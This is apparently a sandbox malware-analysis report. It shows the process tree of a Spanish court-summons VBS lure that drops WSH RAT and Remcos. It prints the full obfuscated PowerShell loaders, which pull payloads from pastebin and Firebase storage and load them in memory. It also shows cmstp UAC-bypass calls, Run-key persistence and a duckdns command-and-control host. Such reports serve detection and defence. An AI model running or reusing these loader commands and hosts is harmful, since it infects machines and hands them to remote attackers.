        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -encodedCommand JABmACAAPQAgACgAWwBTAHkAcwB0AGUAbQAuAEkATwAuAFAAYQB0AGgAXQA6ADoARwBlAHQAVABlAG0AcABQAGEAdABoACgAKQAgACsAIAAnAGQAbABsADAAMQAuAHQAeAB0ACcAKQAgADsAJABRAFAAdABhAHYAIAA9ACAAKAAgAEcAZQB0AC0AQwBvAG4AdABlAG4AdAAgAC0AUABhAHQAaAAgACQAZgAgACkAIAA7AEkAbgB2AG8AawBlAC0AVwBlAGIAUgBlAHEAdQBlAHMAdAAgAC0AVQBSAEkAIAAkAFEAUAB0AGEAdgAgAC0ATwB1AHQARgBpAGwAZQAgACQAZgAgAC0AVQBzAGUAQgBhAHMAaQBjAFAAYQByAHMAaQBuAGcA -inputFormat xml -outputFormat text
        10⤵
        Blocklisted process makes network request
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:936
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
        10⤵
        System Location Discovery: System Language Discovery
        Modifies registry class
        Suspicious use of AdjustPrivilegeToken
        
        PID:5580
        
        C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\System32\taskkill.exe" /im cmstp.exe /f
        11⤵
        System Location Discovery: System Language Discovery
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:5648
        
        C:\Windows\SysWOW64\cmstp.exe
        
        "C:\Windows\system32\cmstp.exe" /au C:\Windows\temp\vt1unydk.inf
        11⤵
        System Location Discovery: System Language Discovery
        
        PID:1444
        
        C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\System32\taskkill.exe" /im cmstp.exe /f
        11⤵
        System Location Discovery: System Language Discovery
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:5224
        
        C:\Windows\SysWOW64\cmstp.exe
        
        "C:\Windows\system32\cmstp.exe" /au C:\Windows\temp\g24mlp53.inf
        11⤵
        System Location Discovery: System Language Discovery
        
        PID:5416
        
        C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\System32\taskkill.exe" /im cmstp.exe /f
        11⤵
        System Location Discovery: System Language Discovery
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:2628
        
        C:\Windows\SysWOW64\cmstp.exe
        
        "C:\Windows\system32\cmstp.exe" /au C:\Windows\temp\uxkafbt2.inf
        11⤵
        System Location Discovery: System Language Discovery
        
        PID:5864
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ncocck.js"
        11⤵
        Checks computer location settings
        Drops startup file
        Adds Run key to start application
        System Location Discovery: System Language Discovery
        
        PID:1644
        
        C:\Windows\SysWOW64\wscript.exe
        
        "C:\Windows\System32\wscript.exe" //B "C:\Users\Admin\AppData\Roaming\ncocck.js"
        12⤵
        Blocklisted process makes network request
        Checks computer location settings
        Drops startup file
        Adds Run key to start application
        System Location Discovery: System Language Discovery
        
        PID:4964
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c taskkill /F /IM kl-plugin.exe
        13⤵
        System Location Discovery: System Language Discovery
        
        PID:2124
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /F /IM kl-plugin.exe
        14⤵
        System Location Discovery: System Language Discovery
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:1068
        
        C:\Users\Admin\AppData\Roaming\kl-plugin.exe
        
        "C:\Users\Admin\AppData\Roaming\kl-plugin.exe" peinadorafael779.duckdns.org 2015 "WSHRAT|24025E54|UTKBEBLO|Admin|Microsoft Windows 10 Pro|plus|nan-av|false - 29/10/2024|JavaScript-v2.0|GB:United Kingdom" 1
        13⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious use of SetWindowsHookEx
        
        PID:1548
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c start /b powershell –ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\Admin\AppData\Local\Temp\azul 29-10-2024.vbs"' & exit
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:5512
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell –ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\Admin\AppData\Local\Temp\azul 29-10-2024.vbs"'
        6⤵
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Modifies registry class
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3436
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\azul 29-10-2024.vbs"
        7⤵
        Checks computer location settings
        System Location Discovery: System Language Discovery
        
        PID:2696
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $IuJUJJZz = 'WwBT☹Hk☹cwB0☹GU☹bQ☹u☹E4☹ZQB0☹C4☹UwBl☹HI☹dgBp☹GM☹ZQBQ☹G8☹aQBu☹HQ☹TQBh☹G4☹YQBn☹GU☹cgBd☹Do☹OgBT☹GU☹YwB1☹HI☹aQB0☹Hk☹U☹By☹G8☹d☹Bv☹GM☹bwBs☹C☹☹PQ☹g☹Fs☹UwB5☹HM☹d☹Bl☹G0☹LgBO☹GU☹d☹☹u☹FM☹ZQBj☹HU☹cgBp☹HQ☹eQBQ☹HI☹bwB0☹G8☹YwBv☹Gw☹V☹B5☹H☹☹ZQBd☹Do☹OgBU☹Gw☹cw☹x☹DI☹Ow☹k☹EM☹QwBS☹Gg☹bQ☹g☹D0☹I☹☹n☹Gg☹d☹B0☹H☹☹cw☹6☹C8☹LwBw☹GE☹cwB0☹GU☹YgBp☹G4☹LgBj☹G8☹bQ☹v☹HI☹YQB3☹C8☹QQBk☹HY☹OQBn☹EI☹S☹Bh☹Cc☹I☹☹7☹CQ☹Zg☹g☹D0☹I☹☹o☹Fs☹UwB5☹HM☹d☹Bl☹G0☹LgBJ☹E8☹LgBQ☹GE☹d☹Bo☹F0☹Og☹6☹Ec☹ZQB0☹FQ☹ZQBt☹H☹☹U☹Bh☹HQ☹a☹☹o☹Ck☹I☹☹r☹C☹☹JwBk☹Gw☹b☹☹w☹DE☹LgB0☹Hg☹d☹☹n☹Ck☹I☹☹7☹Ek☹bgB2☹G8☹awBl☹C0☹VwBl☹GI☹UgBl☹HE☹dQBl☹HM☹d☹☹g☹C0☹VQBS☹Ek☹I☹☹k☹EM☹QwBS☹Gg☹bQ☹g☹C0☹TwB1☹HQ☹RgBp☹Gw☹ZQ☹g☹CQ☹Zg☹g☹C0☹VQBz☹GU☹QgBh☹HM☹aQBj☹F☹☹YQBy☹HM☹aQBu☹Gc☹I☹☹7☹GM☹bQBk☹C4☹ZQB4☹GU☹I☹☹v☹GM☹I☹☹7☹H☹☹aQBu☹Gc☹I☹☹x☹DI☹Nw☹u☹D☹☹Lg☹w☹C4☹MQ☹g☹Ds☹c☹Bv☹Hc☹ZQBy☹HM☹a☹Bl☹Gw☹b☹☹u☹GU☹e☹Bl☹C☹☹LQBj☹G8☹bQBt☹GE☹bgBk☹C☹☹ew☹k☹GY☹I☹☹9☹C☹☹K☹Bb☹FM☹eQBz☹HQ☹ZQBt☹C4☹SQBP☹C4☹U☹Bh☹HQ☹a☹Bd☹Do☹OgBH☹GU☹d☹BU☹GU☹bQBw☹F☹☹YQB0☹Gg☹K☹☹p☹C☹☹Kw☹g☹Cc☹Z☹Bs☹Gw☹M☹☹x☹C4☹d☹B4☹HQ☹Jw☹p☹C☹☹Ow☹k☹FE☹U☹B0☹GE☹dg☹g☹D0☹I☹☹o☹C☹☹RwBl☹HQ☹LQBD☹G8☹bgB0☹GU☹bgB0☹C☹☹LQBQ☹GE☹d☹Bo☹C☹☹J☹Bm☹C☹☹KQ☹g☹Ds☹SQBu☹HY☹bwBr☹GU☹LQBX☹GU☹YgBS☹GU☹cQB1☹GU☹cwB0☹C☹☹LQBV☹FI☹SQ☹g☹CQ☹UQBQ☹HQ☹YQB2☹C☹☹LQBP☹HU☹d☹BG☹Gk☹b☹Bl☹C☹☹J☹Bm☹C☹☹LQBV☹HM☹ZQBC☹GE☹cwBp☹GM☹U☹Bh☹HI☹cwBp☹G4☹ZwB9☹C☹☹Ow☹k☹FE☹U☹B0☹GE☹dg☹g☹D0☹I☹☹o☹C☹☹RwBl☹HQ☹LQBD☹G8☹bgB0☹GU☹bgB0☹C☹☹LQBQ☹GE☹d☹Bo☹C☹☹J☹Bm☹C☹☹KQ☹g☹Ds☹J☹B4☹Go☹aQBr☹Gc☹I☹☹9☹C☹☹Jw☹w☹Cc☹I☹☹7☹CQ☹cQB4☹GE☹agB3☹C☹☹PQ☹g☹Cc☹JQBK☹Gs☹UQBh☹HM☹R☹Bm☹Gc☹cgBU☹Gc☹JQ☹n☹C☹☹OwBb☹EI☹eQB0☹GU☹WwBd☹F0☹I☹☹k☹HI☹cgB1☹GE☹aQ☹g☹D0☹I☹Bb☹HM☹eQBz☹HQ☹ZQBt☹C4☹QwBv☹G4☹dgBl☹HI☹d☹Bd☹Do☹OgBG☹HI☹bwBt☹EI☹YQBz☹GU☹Ng☹0☹FM☹d☹By☹Gk☹bgBn☹Cg☹I☹☹k☹FE☹U☹B0☹GE☹dg☹u☹HI☹ZQBw☹Gw☹YQBj☹GU☹K☹☹n☹CQ☹J☹☹n☹Cw☹JwBB☹Cc☹KQ☹g☹Ck☹I☹☹7☹Fs☹UwB5☹HM☹d☹Bl☹G0☹LgBB☹H☹☹c☹BE☹G8☹bQBh☹Gk☹bgBd☹Do☹OgBD☹HU☹cgBy☹GU☹bgB0☹EQ☹bwBt☹GE☹aQBu☹C4☹T☹Bv☹GE☹Z☹☹o☹CQ☹cgBy☹HU☹YQBp☹Ck☹LgBH☹GU☹d☹BU☹Hk☹c☹Bl☹Cg☹JwBU☹GU☹a☹B1☹Gw☹YwBo☹GU☹cwBY☹Hg☹W☹B4☹Hg☹LgBD☹Gw☹YQBz☹HM☹MQ☹n☹Ck☹LgBH☹GU☹d☹BN☹GU☹d☹Bo☹G8☹Z☹☹o☹Cc☹TQBz☹HE☹QgBJ☹GI☹WQ☹n☹Ck☹LgBJ☹G4☹dgBv☹Gs☹ZQ☹o☹CQ☹bgB1☹Gw☹b☹☹s☹C☹☹WwBv☹GI☹agBl☹GM☹d☹Bb☹F0☹XQ☹g☹Cg☹JwBi☹Dg☹Mg☹4☹Dc☹N☹☹w☹GI☹NQ☹2☹GE☹Nw☹t☹GE☹NQ☹5☹GI☹LQ☹0☹GQ☹MQ☹0☹C0☹M☹☹x☹DI☹M☹☹t☹DE☹N☹☹2☹D☹☹YwBj☹Dg☹OQ☹9☹G4☹ZQBr☹G8☹d☹☹m☹GE☹aQBk☹GU☹bQ☹9☹HQ☹b☹Bh☹D8☹d☹B4☹HQ☹LgBl☹HI☹YgB1☹HQ☹YwBv☹Gw☹dQB6☹GE☹LwBv☹C8☹bQBv☹GM☹LgB0☹G8☹c☹Bz☹H☹☹c☹Bh☹C4☹Mw☹w☹DI☹Mg☹3☹C0☹ZQBy☹GI☹dQB0☹GM☹bw☹v☹GI☹Lw☹w☹HY☹LwBt☹G8☹Yw☹u☹HM☹aQBw☹GE☹ZQBs☹Gc☹bwBv☹Gc☹LgBl☹Gc☹YQBy☹G8☹d☹Bz☹GU☹cwBh☹GI☹ZQBy☹Gk☹Zg☹v☹C8☹OgBz☹H☹☹d☹B0☹Gg☹Jw☹g☹Cw☹I☹☹k☹HE☹e☹Bh☹Go☹dw☹g☹Cw☹I☹☹n☹Gg☹YwBr☹GY☹bwBf☹F8☹XwBf☹F8☹XwBf☹F8☹XwBf☹F8☹XwBf☹F8☹XwBf☹F8☹XwBf☹F8☹XwBf☹F8☹XwBf☹F8☹XwBf☹F8☹XwBf☹F8☹XwBf☹F8☹Xw☹t☹C0☹LQ☹t☹C0☹LQ☹t☹Cc☹L☹☹g☹CQ☹e☹Bq☹Gk☹awBn☹Cw☹I☹☹n☹DE☹Jw☹s☹C☹☹JwBS☹G8☹Z☹Bh☹Cc☹I☹☹p☹Ck☹Ow☹=';$Yolopolhggobek = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $IuJUJJZz.replace('☹','A') ) );$Yolopolhggobek = $Yolopolhggobek.replace('%JkQasDfgrTg%', 'C:\Users\Admin\AppData\Local\Temp\azul 29-10-2024.vbs');powershell $Yolopolhggobek;
        8⤵
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2264
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$CCRhm = 'https://pastebin.com/raw/Adv9gBHa' ;$f = ([System.IO.Path]::GetTempPath() + 'dll01.txt') ;Invoke-WebRequest -URI $CCRhm -OutFile $f -UseBasicParsing ;cmd.exe /c ;ping 127.0.0.1 ;powershell.exe -command {$f = ([System.IO.Path]::GetTempPath() + 'dll01.txt') ;$QPtav = ( Get-Content -Path $f ) ;Invoke-WebRequest -URI $QPtav -OutFile $f -UseBasicParsing} ;$QPtav = ( Get-Content -Path $f ) ;$xjikg = '0' ;$qxajw = 'C:\Users\Admin\AppData\Local\Temp\azul 29-10-2024.vbs' ;[Byte[]] $rruai = [system.Convert]::FromBase64String( $QPtav.replace('$$','A') ) ;[System.AppDomain]::CurrentDomain.Load($rruai).GetType('TehulchesXxXxx.Class1').GetMethod('MsqBIbY').Invoke($null, [object[]] ('b828740b56a7-a59b-4d14-0120-1460cc89=nekot&aidem=tla?txt.erbutcoluza/o/moc.topsppa.30227-erbutco/b/0v/moc.sipaelgoog.egarotsesaberif//:sptth' , $qxajw , 'hckfo____________________________________-------', $xjikg, '1', 'Roda' ));"
        9⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        Suspicious use of SetThreadContext
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:5448
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c
        10⤵
        System Location Discovery: System Language Discovery
        
        PID:5256
        
        C:\Windows\SysWOW64\PING.EXE
        
        "C:\Windows\system32\PING.EXE" 127.0.0.1
        10⤵
        System Location Discovery: System Language Discovery
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:5132
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -encodedCommand JABmACAAPQAgACgAWwBTAHkAcwB0AGUAbQAuAEkATwAuAFAAYQB0AGgAXQA6ADoARwBlAHQAVABlAG0AcABQAGEAdABoACgAKQAgACsAIAAnAGQAbABsADAAMQAuAHQAeAB0ACcAKQAgADsAJABRAFAAdABhAHYAIAA9ACAAKAAgAEcAZQB0AC0AQwBvAG4AdABlAG4AdAAgAC0AUABhAHQAaAAgACQAZgAgACkAIAA7AEkAbgB2AG8AawBlAC0AVwBlAGIAUgBlAHEAdQBlAHMAdAAgAC0AVQBSAEkAIAAkAFEAUAB0AGEAdgAgAC0ATwB1AHQARgBpAGwAZQAgACQAZgAgAC0AVQBzAGUAQgBhAHMAaQBjAFAAYQByAHMAaQBuAGcA -inputFormat xml -outputFormat text
        10⤵
        Blocklisted process makes network request
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:5952
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
        10⤵
        System Location Discovery: System Language Discovery
        Suspicious behavior: GetForegroundWindowSpam
        Suspicious use of AdjustPrivilegeToken
        
        PID:5236
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c start /b powershell –ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\Admin\AppData\Local\Temp\rencos 29-10-2024.vbs"' & exit
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:3792
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell –ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\Admin\AppData\Local\Temp\rencos 29-10-2024.vbs"'
        6⤵
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Modifies registry class
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:264
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\rencos 29-10-2024.vbs"
        7⤵
        Checks computer location settings
        System Location Discovery: System Language Discovery
        
        PID:1160
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $IuJUJJZz = 'WwBT☹Hk☹cwB0☹GU☹bQ☹u☹E4☹ZQB0☹C4☹UwBl☹HI☹dgBp☹GM☹ZQBQ☹G8☹aQBu☹HQ☹TQBh☹G4☹YQBn☹GU☹cgBd☹Do☹OgBT☹GU☹YwB1☹HI☹aQB0☹Hk☹U☹By☹G8☹d☹Bv☹GM☹bwBs☹C☹☹PQ☹g☹Fs☹UwB5☹HM☹d☹Bl☹G0☹LgBO☹GU☹d☹☹u☹FM☹ZQBj☹HU☹cgBp☹HQ☹eQBQ☹HI☹bwB0☹G8☹YwBv☹Gw☹V☹B5☹H☹☹ZQBd☹Do☹OgBU☹Gw☹cw☹x☹DI☹Ow☹k☹EM☹QwBS☹Gg☹bQ☹g☹D0☹I☹☹n☹Gg☹d☹B0☹H☹☹cw☹6☹C8☹LwBw☹GE☹cwB0☹GU☹YgBp☹G4☹LgBj☹G8☹bQ☹v☹HI☹YQB3☹C8☹QQBk☹HY☹OQBn☹EI☹S☹Bh☹Cc☹I☹☹7☹CQ☹Zg☹g☹D0☹I☹☹o☹Fs☹UwB5☹HM☹d☹Bl☹G0☹LgBJ☹E8☹LgBQ☹GE☹d☹Bo☹F0☹Og☹6☹Ec☹ZQB0☹FQ☹ZQBt☹H☹☹U☹Bh☹HQ☹a☹☹o☹Ck☹I☹☹r☹C☹☹JwBk☹Gw☹b☹☹w☹DE☹LgB0☹Hg☹d☹☹n☹Ck☹I☹☹7☹Ek☹bgB2☹G8☹awBl☹C0☹VwBl☹GI☹UgBl☹HE☹dQBl☹HM☹d☹☹g☹C0☹VQBS☹Ek☹I☹☹k☹EM☹QwBS☹Gg☹bQ☹g☹C0☹TwB1☹HQ☹RgBp☹Gw☹ZQ☹g☹CQ☹Zg☹g☹C0☹VQBz☹GU☹QgBh☹HM☹aQBj☹F☹☹YQBy☹HM☹aQBu☹Gc☹I☹☹7☹GM☹bQBk☹C4☹ZQB4☹GU☹I☹☹v☹GM☹I☹☹7☹H☹☹aQBu☹Gc☹I☹☹x☹DI☹Nw☹u☹D☹☹Lg☹w☹C4☹MQ☹g☹Ds☹c☹Bv☹Hc☹ZQBy☹HM☹a☹Bl☹Gw☹b☹☹u☹GU☹e☹Bl☹C☹☹LQBj☹G8☹bQBt☹GE☹bgBk☹C☹☹ew☹k☹GY☹I☹☹9☹C☹☹K☹Bb☹FM☹eQBz☹HQ☹ZQBt☹C4☹SQBP☹C4☹U☹Bh☹HQ☹a☹Bd☹Do☹OgBH☹GU☹d☹BU☹GU☹bQBw☹F☹☹YQB0☹Gg☹K☹☹p☹C☹☹Kw☹g☹Cc☹Z☹Bs☹Gw☹M☹☹x☹C4☹d☹B4☹HQ☹Jw☹p☹C☹☹Ow☹k☹FE☹U☹B0☹GE☹dg☹g☹D0☹I☹☹o☹C☹☹RwBl☹HQ☹LQBD☹G8☹bgB0☹GU☹bgB0☹C☹☹LQBQ☹GE☹d☹Bo☹C☹☹J☹Bm☹C☹☹KQ☹g☹Ds☹SQBu☹HY☹bwBr☹GU☹LQBX☹GU☹YgBS☹GU☹cQB1☹GU☹cwB0☹C☹☹LQBV☹FI☹SQ☹g☹CQ☹UQBQ☹HQ☹YQB2☹C☹☹LQBP☹HU☹d☹BG☹Gk☹b☹Bl☹C☹☹J☹Bm☹C☹☹LQBV☹HM☹ZQBC☹GE☹cwBp☹GM☹U☹Bh☹HI☹cwBp☹G4☹ZwB9☹C☹☹Ow☹k☹FE☹U☹B0☹GE☹dg☹g☹D0☹I☹☹o☹C☹☹RwBl☹HQ☹LQBD☹G8☹bgB0☹GU☹bgB0☹C☹☹LQBQ☹GE☹d☹Bo☹C☹☹J☹Bm☹C☹☹KQ☹g☹Ds☹J☹Br☹Hg☹cQBs☹GU☹I☹☹9☹C☹☹Jw☹w☹Cc☹I☹☹7☹CQ☹YQBy☹Hk☹Z☹Br☹C☹☹PQ☹g☹Cc☹JQBK☹Gs☹UQBh☹HM☹R☹Bm☹Gc☹cgBU☹Gc☹JQ☹n☹C☹☹OwBb☹EI☹eQB0☹GU☹WwBd☹F0☹I☹☹k☹GY☹YgBl☹Gg☹a☹☹g☹D0☹I☹Bb☹HM☹eQBz☹HQ☹ZQBt☹C4☹QwBv☹G4☹dgBl☹HI☹d☹Bd☹Do☹OgBG☹HI☹bwBt☹EI☹YQBz☹GU☹Ng☹0☹FM☹d☹By☹Gk☹bgBn☹Cg☹I☹☹k☹FE☹U☹B0☹GE☹dg☹u☹HI☹ZQBw☹Gw☹YQBj☹GU☹K☹☹n☹CQ☹J☹☹n☹Cw☹JwBB☹Cc☹KQ☹g☹Ck☹I☹☹7☹Fs☹UwB5☹HM☹d☹Bl☹G0☹LgBB☹H☹☹c☹BE☹G8☹bQBh☹Gk☹bgBd☹Do☹OgBD☹HU☹cgBy☹GU☹bgB0☹EQ☹bwBt☹GE☹aQBu☹C4☹T☹Bv☹GE☹Z☹☹o☹CQ☹ZgBi☹GU☹a☹Bo☹Ck☹LgBH☹GU☹d☹BU☹Hk☹c☹Bl☹Cg☹JwBU☹GU☹a☹B1☹Gw☹YwBo☹GU☹cwBY☹Hg☹W☹B4☹Hg☹LgBD☹Gw☹YQBz☹HM☹MQ☹n☹Ck☹LgBH☹GU☹d☹BN☹GU☹d☹Bo☹G8☹Z☹☹o☹Cc☹TQBz☹HE☹QgBJ☹GI☹WQ☹n☹Ck☹LgBJ☹G4☹dgBv☹Gs☹ZQ☹o☹CQ☹bgB1☹Gw☹b☹☹s☹C☹☹WwBv☹GI☹agBl☹GM☹d☹Bb☹F0☹XQ☹g☹Cg☹Jw☹z☹Dk☹MwBi☹GU☹Z☹Bm☹DY☹YQ☹y☹GY☹YQ☹t☹Dc☹ZgBm☹Dk☹LQ☹3☹Dk☹ZQ☹0☹C0☹Zg☹x☹Dc☹ZQ☹t☹DE☹NQ☹x☹DY☹N☹☹y☹GM☹Ng☹9☹G4☹ZQBr☹G8☹d☹☹m☹GE☹aQBk☹GU☹bQ☹9☹HQ☹b☹Bh☹D8☹d☹B4☹HQ☹LgBU☹EM☹Tw☹t☹FM☹TwBD☹E4☹RQBS☹C8☹bw☹v☹G0☹bwBj☹C4☹d☹Bv☹H☹☹cwBw☹H☹☹YQ☹u☹DM☹M☹☹y☹DI☹Nw☹t☹GU☹cgBi☹HU☹d☹Bj☹G8☹LwBi☹C8☹M☹B2☹C8☹bQBv☹GM☹LgBz☹Gk☹c☹Bh☹GU☹b☹Bn☹G8☹bwBn☹C4☹ZQBn☹GE☹cgBv☹HQ☹cwBl☹HM☹YQBi☹GU☹cgBp☹GY☹Lw☹v☹Do☹cwBw☹HQ☹d☹Bo☹Cc☹I☹☹s☹C☹☹J☹Bh☹HI☹eQBk☹Gs☹I☹☹s☹C☹☹JwBf☹F8☹XwBf☹HM☹dgBo☹GM☹YwBf☹F8☹XwBf☹F8☹XwBf☹F8☹XwBf☹F8☹XwBf☹F8☹XwBf☹F8☹XwBf☹F8☹XwBf☹F8☹XwBf☹F8☹XwBf☹F8☹XwBf☹F8☹XwBf☹F8☹XwBf☹F8☹XwBf☹C0☹LQ☹t☹C0☹LQ☹t☹C0☹Jw☹s☹C☹☹J☹Br☹Hg☹cQBs☹GU☹L☹☹g☹Cc☹MQ☹n☹Cw☹I☹☹n☹FI☹bwBk☹GE☹Jw☹g☹Ck☹KQ☹7☹☹==';$Yolopolhggobek = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $IuJUJJZz.replace('☹','A') ) );$Yolopolhggobek = $Yolopolhggobek.replace('%JkQasDfgrTg%', 'C:\Users\Admin\AppData\Local\Temp\rencos 29-10-2024.vbs');powershell $Yolopolhggobek;
        8⤵
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1008
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$CCRhm = 'https://pastebin.com/raw/Adv9gBHa' ;$f = ([System.IO.Path]::GetTempPath() + 'dll01.txt') ;Invoke-WebRequest -URI $CCRhm -OutFile $f -UseBasicParsing ;cmd.exe /c ;ping 127.0.0.1 ;powershell.exe -command {$f = ([System.IO.Path]::GetTempPath() + 'dll01.txt') ;$QPtav = ( Get-Content -Path $f ) ;Invoke-WebRequest -URI $QPtav -OutFile $f -UseBasicParsing} ;$QPtav = ( Get-Content -Path $f ) ;$kxqle = '0' ;$arydk = 'C:\Users\Admin\AppData\Local\Temp\rencos 29-10-2024.vbs' ;[Byte[]] $fbehh = [system.Convert]::FromBase64String( $QPtav.replace('$$','A') ) ;[System.AppDomain]::CurrentDomain.Load($fbehh).GetType('TehulchesXxXxx.Class1').GetMethod('MsqBIbY').Invoke($null, [object[]] ('393bedf6a2fa-7ff9-79e4-f17e-151642c6=nekot&aidem=tla?txt.TCO-SOCNER/o/moc.topsppa.30227-erbutco/b/0v/moc.sipaelgoog.egarotsesaberif//:sptth' , $arydk , '____svhcc________________________________________-------', $kxqle, '1', 'Roda' ));"
        9⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        Suspicious use of SetThreadContext
        System Location Discovery: System Language Discovery
        Suspicious use of AdjustPrivilegeToken
        
        PID:3488
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c
        10⤵
        System Location Discovery: System Language Discovery
        
        PID:2960
        
        C:\Windows\SysWOW64\PING.EXE
        
        "C:\Windows\system32\PING.EXE" 127.0.0.1
        10⤵
        System Location Discovery: System Language Discovery
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:3324
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -encodedCommand JABmACAAPQAgACgAWwBTAHkAcwB0AGUAbQAuAEkATwAuAFAAYQB0AGgAXQA6ADoARwBlAHQAVABlAG0AcABQAGEAdABoACgAKQAgACsAIAAnAGQAbABsADAAMQAuAHQAeAB0ACcAKQAgADsAJABRAFAAdABhAHYAIAA9ACAAKAAgAEcAZQB0AC0AQwBvAG4AdABlAG4AdAAgAC0AUABhAHQAaAAgACQAZgAgACkAIAA7AEkAbgB2AG8AawBlAC0AVwBlAGIAUgBlAHEAdQBlAHMAdAAgAC0AVQBSAEkAIAAkAFEAUAB0AGEAdgAgAC0ATwB1AHQARgBpAGwAZQAgACQAZgAgAC0AVQBzAGUAQgBhAHMAaQBjAFAAYQByAHMAaQBuAGcA -inputFormat xml -outputFormat text
        10⤵
        Blocklisted process makes network request
        System Location Discovery: System Language Discovery
        Suspicious use of AdjustPrivilegeToken
        
        PID:224
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
        10⤵
        Adds Run key to start application
        System Location Discovery: System Language Discovery
        
        PID:3956
        
        C:\ProgramData\Remcos\remcos.exe
        
        "C:\ProgramData\Remcos\remcos.exe"
        11⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:368

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\NOTIFICACION_DE_DEMANDA#28102024103000000\NOTIFICACION_DE_DEMANDA#28102024103000000.vbs"
1⤵
- Checks computer location settings
PID:5628
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
